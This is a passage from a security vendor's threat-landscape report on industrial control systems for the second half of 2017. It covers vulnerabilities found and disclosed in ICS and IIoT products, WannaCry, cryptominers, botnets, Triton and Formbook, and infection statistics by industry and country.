On top of the new IoT device flaws, some old vulnerabilities are still not closed, such as [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) in Realtek devices and the vulnerability dating back to 2012 that can be exploited to obtain the configuration of [Serial-to-Ethernet converters](<https://www.bleepingcomputer.com/news/security/thousands-of-serial-to-ethernet-devices-leak-telnet-passwords/>), including the Telnet password, by sending a request on port 30718. The vulnerability in Serial-to-Ethernet converters directly affects the industrial internet of things (IIoT), since many systems that enable the operators of industrial equipment to remotely monitor its status, modify its settings and control its operation are based on serial interface converters.

The security of IoT devices is also affected by issues relating to the security of traditional information technology.
Specifically, vulnerabilities in implementations of the Bluetooth protocol led to the emergence of a new attack vector, [BlueBorne](<https://ics-cert.kaspersky.com/news/2017/09/15/blueborne/>), which poses a threat to mobile, desktop and IoT operating systems.

## Vulnerabilities identified by Kaspersky Lab ICS CERT

In 2017, Kaspersky Lab ICS CERT experts not only analyzed the security issues associated with different vendors' ICS components, but also focused on the common ICS components, platforms and technologies used in different vendors' solutions. This type of research is important because vulnerabilities in such components significantly increase the number of potential attack victims. Research in this area continues in 2018.

### Number of vulnerabilities identified

Based on its research, Kaspersky Lab ICS CERT identified 63 vulnerabilities in industrial and IIoT/IoT systems in 2017.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130435/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-4.png>)

_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 by types of components analyzed_

Every time we identified a vulnerability, we promptly notified the respective product's vendor.

### Number of CVE entries published

During 2017, 11 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT. It should be noted that some of these CVE entries were published after vendors closed vulnerabilities, information on which had been provided to them in 2016.

Information on other vulnerabilities identified by Kaspersky Lab ICS CERT experts will be published after these vulnerabilities are closed by the respective vendors.

### Capabilities provided by the vulnerabilities identified

The largest number of vulnerabilities identified (29) could allow an attacker to cause denial of service (DoS) remotely.
8% of the vulnerabilities identified could allow an attacker to execute arbitrary code remotely on the target system.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130442/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-5.png>)

_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 by capabilities provided_

### Vulnerabilities in ICS components

In 2017, Kaspersky Lab ICS CERT experts identified 30 vulnerabilities in ICS products from different vendors. These are mainly large automation system vendors, such as Schneider Electric, Siemens, Rockwell Automation, Emerson, and others.

#### Severity ratings of the vulnerabilities identified

To assess the severity of vulnerabilities identified in ICS components, Kaspersky Lab ICS CERT used its own vulnerability rating system based on the metrics defined in the [CVSS v3.0](<https://www.first.org/cvss/v2/faq>) (Common Vulnerability Scoring System) standard, with the following severity levels:

 * least severe: CVSS v3.0 base score of 5.0 or less,
 * medium severity: CVSS v3.0 base score of 5.1 to 6.9 (inclusive),
 * most severe: CVSS v3.0 base score of 7.0 or more.

The absolute majority of vulnerabilities identified are in the most severe group. These include the [XXE vulnerability in industrial solutions](<https://ics-cert.kaspersky.com/news/2017/09/07/closing-an-xxe-vulnerability-in-siemens-industrial-solutions/>) that use the Discovery Service of the OPC UA protocol stack.

#### Vulnerabilities in OPC UA implementations

One of the research areas involved searching for vulnerabilities in different implementations of the OPC UA technology. This type of research is needed to improve the overall security level of products from different vendors that use the technology in their solutions.
Vulnerabilities in such technologies are a Swiss army knife of sorts for attackers, enabling them to hack industrial systems from different vendors.

A total of 17 critical denial-of-service vulnerabilities were identified during the period.

Some of the vulnerabilities were identified in sample software implementations of various OPC UA functions available in the official GitHub repository. In the process of communicating with several vendors of industrial automation systems, we found out that many of them had used code from such samples in their product code. This means that the vulnerabilities identified may affect complete product lines from different vendors.

### Vulnerabilities in third-party hardware-based and software solutions

Kaspersky Lab ICS CERT experts have also analyzed third-party hardware-based solutions that are widely used in industrial automation systems.

Specifically, experts analyzed the SafeNet Sentinel hardware-based solution by Gemalto. As a result of the research, [15 vulnerabilities](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>) were identified in the software part of the solution (11 in December 2016 and 4 in 2017). These flaws affect a large number of products that use the vulnerable software, including solutions by ABB, General Electric, HP, Cadac Group, Zemax and other software developers, the number of which may reach 40 thousand, according to some estimates.

### Vulnerabilities in internet of things (IoT and IIoT) components

Another area of research was the assessment of the information security status of internet of things (IoT) components, including industrial internet of things (IIoT) components.

Kaspersky Lab experts are working with vendors to improve the security of their solutions with respect to 11 vulnerabilities identified.
Vulnerabilities were found in the following components and solutions:

 * smart cameras,
 * hardware-based IIoT solutions.

It should be noted that vulnerabilities in implementations of OPC UA standards, which are discussed above, also directly affect IIoT security.

### Vulnerabilities in industrial routers

In the past year, 18 vulnerabilities were identified in industrial networking equipment from different vendors. Typical vulnerabilities: information disclosure, privilege escalation, arbitrary code execution, denial of service.

### Working with software vendors

With respect to information on the vulnerabilities identified, Kaspersky Lab follows the principle of responsible disclosure, promptly reporting vulnerabilities to the respective software vendors.

In 2017, Kaspersky Lab ICS CERT researchers actively collaborated with various companies to ensure that the vulnerabilities identified would be closed.

Of the 63 vulnerabilities identified by Kaspersky Lab ICS CERT in 2017, vendors closed 26. Vulnerabilities were closed by Siemens, General Electric, Rockwell Automation, Gemalto and the [OPC Foundation](<https://en.wikipedia.org/wiki/OPC_Foundation>) industrial consortium.

It should be noted that most vendors of software for industrial automation systems that we have worked with have lately been devoting much more care and resources to closing the vulnerabilities identified and fixing information security issues in their products, including earlier versions.

At the same time, the issue of closing vulnerabilities in industrial automation systems remains relevant. In many cases, it takes large vendors a long time to close vulnerabilities in their products.
Sometimes software vendors decide to patch only new versions of a vulnerable product, which they are planning to release in the future.

In addition, some vendors still need to improve the organizational and technical aspects of the procedures they use to inform customers about the vulnerabilities patched. Even after an update has been released, many users are unaware of the relevant security issue and continue to use vulnerable versions of the product. This is particularly important for embedded software, as well as the technologies and specific program modules used by numerous third-party vendors (one example can be found [here](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>)).

Positive examples include Siemens and the OPC Foundation, which have quickly closed the vulnerabilities identified and released public advisories on existing vulnerabilities.

## Malware in industrial automation systems

As we have [mentioned before](<https://ics-cert.kaspersky.com/reports/2017/03/28/threat-landscape-for-industrial-automation-systems-in-the-second-half-of-2016/#3l3>), many industrial companies use modern networking technologies that improve the transparency and efficiency of enterprise management processes, as well as providing flexibility and fault tolerance for all tiers of industrial automation. As a result, industrial networks are increasingly similar to corporate networks – both in terms of use case scenarios and in terms of the technologies used.
The unfortunate flip side of this is that internet threats, as well as other traditional IT threats, increasingly affect the industrial networks of modern organizations.

In the second half of 2017, Kaspersky Lab security solutions installed on industrial automation systems detected over 17.9 thousand different malware modifications from about 2.4 thousand different malware families.

### Accidental infections

In the vast majority of cases, attempts to infect ICS computers are accidental and are not part of targeted attacks. Consequently, the functionality implemented in the malware is not specific to attacks on industrial automation systems. However, even without ICS-specific functionality, a malware infection can have dire consequences for an industrial automation system, including an emergency shutdown of the industrial process. This was demonstrated by the WannaCry outbreak in May 2017, when several enterprises in different industries had to suspend their industrial processes after being infected with the encryption malware. We wrote about encryption malware-related threats in our [previous report](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/>) and several articles (see [here](<https://ics-cert.kaspersky.com/reports/2017/06/22/wannacry-on-industrial-networks/>) and [here](<https://ics-cert.kaspersky.com/alerts/2017/06/29/more-than-50-percent-of-organizations-attacked-by-expetr-petya-cryptolocker-are-industrial-companies/>)).

#### Unexpected consequences of the WannaCry outbreak

It is important to note that some IT threats can do much more significant harm in an industrial network than in an office network. To demonstrate this, we look at two incidents investigated by the Kaspersky Lab ICS CERT team.

In H2 2017, we were approached by several industrial enterprises at once, where mass infections of industrial networks with WannaCry encryption malware had been detected.
It was later determined that the initial infections of office networks at the victim companies had in all cases taken place back in the first half of 2017, at the height of the WannaCry outbreak. However, the infections were not noticed until the malware propagated to the enterprises' industrial networks. As it turned out during the investigation, the encryption functionality in the malware samples was damaged, and the infected systems on corporate networks continued to operate normally, without any failures. However, the infection of industrial networks in these cases had unexpected negative consequences.

At one of the enterprises infected by WannaCry, the workstations used by operators started to bring up the Blue Screen of Death all the time, leading to emergency reboots. The reason for this unexpected consequence of infection was that the machines ran Windows XP. It is a well-known fact that the DoublePulsar exploit used by WannaCry to propagate causes Windows XP to crash, resulting in a Blue Screen of Death and a reboot. In cases when numerous machines in the industrial segment of an organization's network are infected, Windows XP machines are often attacked and go into emergency reboots. As a result, operators are rendered incapable of monitoring and controlling the industrial process. This makes WannaCry a denial-of-service attack tool of sorts.

In another incident, the propagation of WannaCry caused some of the devices on an enterprise's industrial network to become temporarily unavailable during periods when the network activity of the malware coincided with certain stages in the industrial process.
This resulted in emergency interruptions of an industrial process that was critical for the enterprise, lasting 15 minutes on average.

#### Cryptocurrency miners in industrial network infrastructure

According to Kaspersky Lab ICS CERT data, cryptocurrency mining programs attacked 3.3% of industrial automation system computers during the period from February 2017 to January 2018.

Up to August 2017, the percentage of ICS computers attacked by cryptocurrency miners did not exceed 1%. This figure grew in September and did not go back below 1% for the rest of 2017. In October, cryptocurrency miner attacks against ICS computers peaked, with 2.07% of ICS computers being attacked.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130449/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-6.png>)

_Percentage of ICS computers attacked by cryptocurrency mining malware_

Like other malware infecting systems at industrial enterprises, cryptocurrency miners can pose a threat to industrial process monitoring and control. In the course of its operation, malware of this type creates a significant load on the computer's computational resources. An increased load on processors can negatively affect the operation of the enterprise's ICS components and threaten their stability.

According to our assessments, in most cases cryptocurrency miners infect ICS computers accidentally. There is no reliable information on machines that are part of the industrial network infrastructure being infected as a result of targeted attacks whose goal is to mine cryptocurrencies, with the exception of cases when miners are installed by unscrupulous employees of victim enterprises.
Cryptocurrency mining malware typically enters the industrial network infrastructure from the internet or, less commonly, from removable media or network shares.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130456/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-7.png>)

_Sources of ICS computer infections with cryptocurrency miners, percentage of systems attacked, February 2017 – January 2018_

Cryptocurrency miners have infected numerous websites, including those of industrial companies. In such cases, cryptocurrencies are mined on the systems of users who visit the infected web resources. This technique is called cryptojacking.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130503/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-8.png>)

_Screenshot showing a fragment of code found on a web resource infected with mining malware_

#### Botnet agents in the industrial network infrastructure

In most cases, the functionality of botnet agents includes searching for and stealing financial information, stealing authentication data, brute-forcing passwords, sending spam, and conducting attacks on specified remote internet resources, including distributed denial-of-service (DDoS) attacks. In addition, in cases where a botnet agent attacks third-party resources (such cases have been detected), the companies that own the IP addresses from which the attacks are launched may face certain reputational risks.

Although the destructive activity of botnet agents is not specifically designed to disrupt the operation of any industrial system, an infection with this type of malware may pose a significant threat to a facility that is part of the industrial infrastructure. Malware of this type can cause network failures and denial of service (DoS) of the infected system and other devices on the network.
It is also common for malware to contain errors in its code and/or be incompatible with software used to control the industrial infrastructure, potentially resulting in the disruption of industrial process monitoring and control.

Another danger associated with botnet agents is that malware of this type often includes data collection functionality and, like backdoor malware, enables the attackers to control the infected machine surreptitiously. The system data collected by bots by default is sufficient for accurately identifying the company that owns the system and the type of the infected system. What's more, access to machines infected with botnet agents is often put up for sale at specialized exchanges on the Darknet. Consequently, threat actors interested in infected industrial control systems can gain access to a victim company's sensitive data and/or systems used to control the industrial infrastructure.

In 2017, 10.8% of all ICS systems were attacked by botnet agents. Moreover, botnet agent attack statistics show that 2% of ICS systems were attacked by several malicious programs of this type at once.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130511/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-9.png>)

_Percentage of ICS computers attacked by botnet agents in 2017_

The main sources of botnet agent attacks on ICS systems in 2017 were the internet, removable media and email messages.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130518/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-10.png>)

_Sources of ICS infection with botnet agents, percentage of ICS computers attacked, 2017_

This once again demonstrates the need for access control to ensure that information is exchanged securely between an enterprise's industrial network and other networks, as well as the need to block unauthorized removable media from connecting to ICS
systems and to install tools designed to detect and filter malicious objects from email messages.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130524/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-11.png>)

_Top 5 botnet agents most commonly found on ICS systems in 2017, percentage of ICS computers attacked_

Nearly two percent of all systems analyzed were attacked with Virus.Win32.Sality malware. In addition to infecting other executable files, this malware includes functionality for resisting antivirus solutions and downloading additional malicious modules from the command-and-control server. The most widespread Sality modules are components for sending spam, stealing authentication data stored on the system and downloading and installing other malware.

The Dinihou botnet agent, which attacked 0.9% of the ICS systems analyzed, is in second position. The malware includes functionality that enables the attackers to upload an arbitrary file from an infected system, creating the threat of sensitive data leaks for victim organizations. In addition, both Worm.VBS.Dinihou and Virus.Win32.Nimnul, which is in third place with 0.88%, can be used to download and install other malware on infected systems.

Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.

The fifth position is taken up by Backdoor.Win32.Androm, which ranked highest based on the number of attacks on ICS systems in H2 2016.
The malware provides the attackers with a variety of information on the infected system and enables them to download and install modules for performing destructive activities, such as stealing sensitive data.

### Targeted attacks

2017 saw the publication of information on two targeted attacks on systems that are part of the industrial infrastructure – [Industroyer](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/#21>) and [Trisis/Triton](<https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>). In these attacks, for the first time since Stuxnet, threat actors created their own implementations of industrial network protocols, gaining the ability to communicate with devices directly.

#### Trisis/Triton

In December 2017, researchers reported discovering previously unknown malware that targeted critical infrastructure systems. The discovery was made as a result of investigating an incident at an unnamed industrial enterprise. The malicious program was dubbed Triton or Trisis.

The malware is a modular framework that can automatically find Triconex Safety Controllers on the enterprise network, get information on their operating modes and plant malicious code on these devices. Trisis/Triton embeds a backdoor in the device's firmware, enabling the attackers to remotely read and modify not only the code of the legitimate control program, but also the code of the compromised Triconex device's firmware. With such capabilities, attackers can do serious damage to the enterprise's industrial process. The least harmful of the possible negative consequences is the system's emergency shutdown and interruption of the industrial process. It was this type of event that caused a victim organization to launch an investigation, which resulted in the attack being detected.

It remains unknown how the attackers penetrated the enterprise's infrastructure.
What is known is that they must have been inside the compromised organization's network for a sufficiently long time (several months) and used legitimate software and 'dual-use' utilities for lateral movement and privilege escalation.

Although the attack was designed to modify code on Triconex devices, the code that the attackers were apparently trying to inject in the last stage of the attack has never been found, so it is currently impossible to determine the final objective of the attack.

#### Spear phishing — Formbook spyware

Spear phishing attacks on industrial organizations continued in the second half of 2017. We have already [written](<https://ics-cert.kaspersky.com/reports/2017/06/15/nigerian-phishing-industrial-companies-under-attack/>) about spear phishing used by threat actors in Business Email Compromise (BEC) attacks. Compared to the attacks described earlier, the attackers' tactics have not changed significantly. However, in addition to known Trojan-Spy malware sent in phishing emails to global industrial and energy companies (FareIT, HawkEye, ISRStealer, etc.), a new representative of this malware class – Formbook – gained popularity in the second half of 2017.

Formbook attacks involve sending phishing emails with malicious Microsoft Office documents attached. To download and install malware on target systems, these documents exploit the CVE-2017-8759 vulnerability or use macros. Some phishing emails include attached archives of different formats containing the malicious program's executable file. Examples of attached file names:

* RFQ for Material Equipment for Aweer Power Station H Phase IV.exe
* Scanned DOCUMENTS & Bank Details For Confirmation.jpeg (Pages 1- 4) -16012018.jpeg.ace
* PO & PI Scan.png.gz
* zip
* QUOTATION LISTS.CAB
* shipping receipts.ace

_Sample phishing email used to distribute Formbook_

In terms of implementation and the techniques used to obfuscate the code and encrypt the payload, Formbook differs from its 'peers' mainly in that its functionality is more extensive. In addition to standard spyware features, such as taking screenshots, capturing keypresses and stealing passwords stored in browsers, Formbook can steal sensitive data from HTTP/HTTPS/SPDY/HTTP2 traffic and web forms. Additionally, the malware implements remote system control functionality and uses an unusual technique to resist the analysis of network traffic. The Trojan generates a set of URLs to which it is going to connect, using a list of legitimate domains stored in its body. It then adds one URL for its command-and-control server. In this way, the malware attempts to mask its connections to the malicious domain by sending numerous requests to legitimate resources, making its detection and analysis more difficult.

## Threat statistics

_All statistical data used in this report was collected using the [Kaspersky Security Network](<https://kas.pr/Gzu1>) (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to product limitations and regulatory restrictions._

### Methodology

The data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations.
This group includes Windows computers that perform one or several of the following functions:

* supervisory control and data acquisition (SCADA) servers,
* data storage servers (Historian),
* data gateways (OPC),
* stationary workstations of engineers and operators,
* mobile workstations of engineers and operators,
* Human Machine Interface (HMI).

The statistics analyzed also include data received from computers of industrial control network administrators and of software developers who develop software for industrial automation systems.

For the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of _unique_ computers attacked to all computers in our sample from which we received anonymized information during the reporting period.

ICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.

Workstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.

As a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 40% of all machines have regular or full-time internet connections.
The remaining machines connect to the Internet no more than once a month, many less frequently than that.

### Percentage of computers attacked

In the second half of 2017, Kaspersky Lab products blocked attempted infections on **37.8%** of the ICS computers they protect, which is 0.2 percentage points more than in the first half of 2017 and 1.4 percentage points less than in the second half of 2016.

June – August 2017 saw a decline in the number of attacked computers. However, in September there was a notable increase in cybercriminal activity, with the proportion of attacked machines rising to 20% and not falling below that level again for the rest of the year.

_Percentage of ICS computers attacked globally by month, 2017_

When comparing these values with the same period in 2016, we see that the July numbers are practically identical. However, for all other months the percentage of attacked machines in 2016 was higher than in 2017.

_Percentage of ICS computers attacked globally by month, H2 2017 vs H2 2016_

The decrease in the percentage of computers attacked can be attributed to several factors. It is likely that one has to do with industrial enterprises paying more attention to the security of the industrial segments of their networks.
According to our experts' assessments, the changes for the better may be largely due to simple measures: enterprises have begun to audit the industrial segments of their networks, train employees in the principles of cyber-hygiene, separate access rights between the corporate and industrial segments of their networks more carefully, etc.

### Percentage of ICS computers attacked in different industries

According to our assessment, medium-size and large companies with mature IT security processes tend to use Kaspersky Lab corporate solutions (mainly Kaspersky Industrial CyberSecurity and Kaspersky Endpoint Security) to safeguard their ICS infrastructure. Many smaller organizations and individual engineers, along with companies whose IT and OT cybersecurity still leaves much to be desired, may rely on Kaspersky Lab consumer solutions to protect their ICS computers. The percentage of such computers attacked by malware during the reporting period is significantly higher than the corresponding figures for computers protected by corporate products.

We intentionally excluded statistics coming from our consumer solutions when analyzing attacks on industrial facilities in different industries, using only telemetry data coming from Kaspersky Lab products for corporate users.
This resulted in lower average percentages of attacked computers than in the rest of the analysis results presented in this report, where both Kaspersky Lab corporate and consumer product statistics were used.

_Percentage of ICS computers attacked in different industries*, H2 2017 vs H1 2017_

*In this report, unlike our previous reports, we calculated the percentage of attacked ICS computers for each industry (the ratio of ICS computers attacked in an industry to all ICS computers in that industry).

In previous reports, we included the distribution of attacked ICS computers by industry (the ratio of computers attacked in a given industry to all attacked computers in our sample).

According to statistics on attacks against facilities in different industries, nearly all industries demonstrate similar percentages of attacked ICS computers, in the range from 26 to 30 percent.
We believe this may be due to the similarity of the ICS architectures used to automate industrial processes at enterprises in various industries and, possibly, similarities in the processes used by enterprises to exchange information with external entities and inside the enterprises themselves.

Two industries were attacked more than others during the reporting period: the figures for Energy (38.7%) and Engineering & ICS Integrators (35.3%) are above 35%.

We believe that the high percentage of attacked ICS systems in the energy sector may be explained, on the one hand, by the greater network connectivity of electric power sector facilities (compared to facilities in other industries) and, on the other hand, perhaps by the fact that, on average, more people have access to the industrial control systems of energy sector facilities than to those at enterprises in other industries.

The supply chain attack vector has infamously been used in some devastating attacks in recent years, which is why the high percentage of attacked ICS computers in Engineering and ICS Integration businesses is a problem serious enough to be noticed.

The only industry whose figures showed significant growth over the six months (+5.2 p.p.) is Construction (31.1%). The reason for the high percentage of ICS computers attacked in construction organizations could be that, for enterprises in the industry, industrial control systems often perform auxiliary functions, were introduced a relatively short time ago and are consequently at the periphery of company owners' and managers' attention. The upshot of this may be that objectives associated with protecting these systems from cyberthreats are regarded as having a relatively low priority. Whatever the reason for the high percentage of attacks reaching industrial control systems in construction and engineering, the fact seems sufficiently alarming.
Construction is known to be a highly competitive business, and cyberattacks on industrial organizations in this industry can be used as a means of unfair competition. So far, cyberattacks have been used in the construction industry mainly for purposes associated with the theft of commercial secrets. Infecting industrial control systems may provide threat actors with a new weapon in their fight against competitors.

The three least attacked industries are Mining (23.5%), Logistic & Transportation (19.8%) and ICS Software Development (14.7%).

ICS vendor infections can be very dangerous, because the consequences of an attack, spread over the infected vendor's partner ecosystem and customer base, could be dramatic, as we saw in recent wide-scale incidents such as the exPetr malware epidemic.

This report includes information on ICS computers at educational facilities. These figures include not only ICS systems used in demonstration stands and labs performing instructional and research functions, but also industrial automation systems of various facilities that are part of the infrastructure of educational establishments, such as power supply systems (including power generation and distribution), utilities, etc., as well as ICS used in pilot production facilities.

The figure for educational establishments can be regarded as representing the "background level" of accidental threats affecting ICS systems, considering systems at educational establishments to be as insecure as such systems can get.
This is because ICS systems at educational establishments are usually connected to the respective organizations' general-purpose networks and are less isolated from the outside world than the systems of industrial facilities.

At the same time, we believe that attacks on ICS systems at educational establishments can also pose a significant threat to enterprises in different real-sector industries – primarily because universities/colleges maintain working contacts and engage in collaboration with industrial enterprises. This includes joint research labs, engineering and development centers, personnel training and career development centers, etc.

In addition, such ICS systems can be used by attackers to test and debug malicious code and refine attacks against real-sector enterprises.

Education demonstrates the greatest difference between the H1 and H2 percentages of ICS systems attacked. The high figure for H1 was due to the large number of internet-borne attacks, as well as attacks by malware belonging to the [Trojan.Multi.Powercod](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>) family. That malware uses techniques similar to those described by our colleagues [here](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>). In H1 2017, 9.8% of ICS computers in educational establishments from our sample were attacked by Powercod Trojans.
In H2, the corresponding figure was 0.7%.

### Sources of industrial automation system infection

_Main sources of threats blocked on ICS computers, percentage of ICS computers attacked, H2 2017 vs H1 2017_

In the second half of 2017, most of the numbers for the main infection sources remained at H1 2017 levels.

For computers that are part of the industrial infrastructure, the internet remains the main source of infection. Contributing factors include interfaces between corporate and industrial networks, availability of limited internet access from industrial networks, and connection of computers on industrial networks to the internet via mobile phone operator networks (using mobile phones, USB modems and/or Wi-Fi routers with 3G/LTE support). Contractors, developers, integrators and system/network administrators that connect to the control network externally (directly or remotely) often have unrestricted internet access. Their computers are in the highest-risk group and can be used by malware as a channel for penetrating the industrial networks of the enterprises they serve. As we mentioned above, about 40% of the computers in our sample connect to the internet on a regular basis. It should be noted that, in addition to malicious and infected websites, the "Internet" category includes phishing emails and malicious attachments opened in web-based email services (in browsers).

Experts from Kaspersky Lab ICS CERT note that malicious programs and scripts built into email message bodies are often used in targeted attacks on industrial enterprises. In most cases, the attackers distribute emails with malicious attachments in office document formats, such as Microsoft Office and PDF, as well as archives containing malicious executable files.

There has also been a 1.7 p.p. decrease in the proportion of threats detected while scanning removable media. This is an important indicator, because such devices are often used to transfer information in industrial networks.

The other figures did not change appreciably.

### Classes of malware

_Malware classes, percentage of ICS computers attacked, H2 2017_

Trojan malware, which is designed to penetrate the systems being attacked and deliver and launch other malware modules, remains relevant to ICS computers. The malicious code of these programs was most commonly written in scripting languages (JavaScript, Visual Basic Script, PowerShell, AutoIt in the AutoCAD format) or took the form of Windows shortcuts (.lnk) that pointed to the next malicious modules.

These Trojans most often tried to download and execute the following malware as main modules:

* spyware Trojans (Trojan-Spy and Trojan-PSW)
* ransomware (Trojan-Ransom)
* backdoors (Backdoor)
* remote administration tools installed without authorization (RAT)
* Wiper type programs (KillDisk) designed to delete (wipe) data on the hard drive and render the computer unusable

Malware infections of computers on an industrial network can result in the loss of control or the disruption of industrial processes.

### Platforms used by malware

In the second half of 2017, we saw a significant increase in the percentage of ICS computers affected by malware written for the JavaScript platform.

_Platforms used by malware, percentage of ICS computers attacked, H2 2017 vs H1 2017_

The main reason for the growing figures for the JavaScript platform is the increase in the number of phishing emails that include a loader for Trojan-Ransom.Win32.Locky.

In the latest versions of such emails, the attackers used a fax-received notification template.

The phishing emails include an attachment – an obfuscated loader written in JavaScript and designed to download and execute the main malicious module from servers controlled by the attackers.

It is important to note that threat actors often attack legitimate websites in order to host malware components on these sites. Threat actors do this to hide malicious traffic behind legitimate domains and mask the traces of an attack.

Cryptocurrency miners also made a small contribution to the increase in the share of the JavaScript platform – both the versions for browsers and the script-based loaders of miners for the Windows platform.

### Geographical distribution of attacks on industrial automation systems

The map below shows the percentage of industrial automation systems attacked relative to the total number of such systems in each country.

_Geographical distribution of attacks on industrial automation systems, H2 2017. Percentage of attacked ICS computers in each country_

TOP 15 countries by percentage of ICS computers attacked:

| | Country* | % of systems attacked |
|---|---|---|
| 1 | Vietnam | 69.6 |
| 2 | Algeria | 66.2 |
| 3 | Morocco | 60.4 |
| 4 | Indonesia | 60.1 |
| 5 | China | 59.5 |
| 6 | Egypt | 57.6 |
| 7 | Peru | 55.2 |
| 8 | Iran | 53.0 |
| 9 | India | 52.4 |
| 10 | Kazakhstan | 50.1 |
| 11 | Saudi Arabia | 48.4 |
| 12 | Mexico | 47.5 |
| 13 | Russia | 46.8 |
| 14 | Malaysia | 46.7 |
| 15 | Turkey | 44.1 |

*_Countries in which the number of ICS computers monitored by Kaspersky Lab ICS CERT was insufficient to obtain representative data sets were excluded from the ranking._

The Top 5 has remained unchanged since H1 2017.

The least affected countries in this ranking are Israel (8.6%), Denmark (13.6%), the UK (14.5%), the Netherlands (14.5%), Sweden (14.8%) and Kuwait (15.3%).

Egypt has moved from ninth place to sixth – the percentage of attacked ICS machines in that country grew by 6.1 p.p. This is the most significant growth among all countries of the world. Internet threats accounted for most of the growth in the percentage of attacked ICS computers in Egypt. Among the internet threats detected, the most common were sites infected with script-based cryptocurrency miners and attempts to download malware by following URL links.

_Main sources of threats blocked on ICS computers in Egypt, percentage of ICS computers attacked, H2 2017 vs H1 2017_

Malware distributed via removable media is also a real problem for many ICS in Egypt.
Malware loaders distributed on removable media are disguised as existing user files on the removable drive, increasing the chances of a successful attack.

_Examples of names used for loaders of malware distributed via removable media that were blocked on ICS computers in Egypt in H2 2017_

In most cases, the loaders that we detected were designed to launch the malware module responsible for infecting the system, including downloading the main module, infecting removable media and network shares, and propagating via email/instant messengers to an existing list of contacts.

_Malicious code for the AutoIt platform, launched by a malicious .lnk loader, blocked on an ICS computer in Egypt in H2 2017_

In Russia during H2 2017, 46.8% of ICS computers were attacked at least once – a 3.8 p.p. rise on H1 2017. This saw Russia move up from 21st to 13th.

The proportions of attacked ICS machines vary greatly between different regions of the world.

_Percentage of ICS systems attacked in regions of the world, H2 2017 vs H1 2017_

All regions can be assigned to one of three groups according to the percentage of attacked ICS machines:

1. Proportion of attacked ICS systems below 30%. This group includes North America and Europe, where the situation looks the most peaceful. Kaspersky Lab ICS CERT specialists say this does not necessarily mean that industrial enterprises in these regions are less frequently attacked by cybercriminals; rather, it could be that more attention is paid to ensuring information security at industrial enterprises in these regions, which results in fewer attacks reaching ICS.
2. Proportion of attacked ICS systems between 30% and 50%. This group includes Latin America, Russia and the Middle East.
3. Proportion of attacked ICS systems above 50%. The situation is most acute in Africa and the Asia-Pacific region.

It should be noted that values may differ significantly between countries within the same region. This may be due to different practices and approaches to ICS information security in those countries.

In particular, the Asia-Pacific region includes Vietnam, with the highest global proportion of attacked ICS systems (69.6%), alongside countries such as Japan (25%), Australia (24.1%) and Singapore (23.2%), where figures did not exceed 25%.

_Percentage of attacked ICS computers in Asia-Pacific countries, H2 2017 vs H1 2017_

In Europe, Denmark's score (13.6%) was not only the lowest in the region but also one of the lowest globally, while the proportions of attacked ICS systems in Belarus (41%), Portugal (42.5%) and Ukraine (41.4%) were all above 40%.

_Percentage of attacked ICS computers in Europe, H2 2017 vs H1 2017_

Let's now look at the sources of attacks that affected ICS systems in different regions.

_Main sources of threats blocked on ICS computers in different regions, H2 2017_

In all regions of the world, the internet remains the main source of attacks. However, in Europe and North America, the percentage of blocked web-borne attacks is substantially lower than elsewhere. This may be because most enterprises operating in those regions adhere to information security standards. In particular, internet access is restricted on systems that are part of industrial networks. The situation is similar for infected removable devices: the highest numbers are seen in Africa and the Asia-Pacific region, while the lowest are in Europe and North America. These figures also reflect the level of compliance with information security standards and, in particular, whether restrictions are in place to prevent the connection of unauthorized removable media to industrial infrastructure systems.

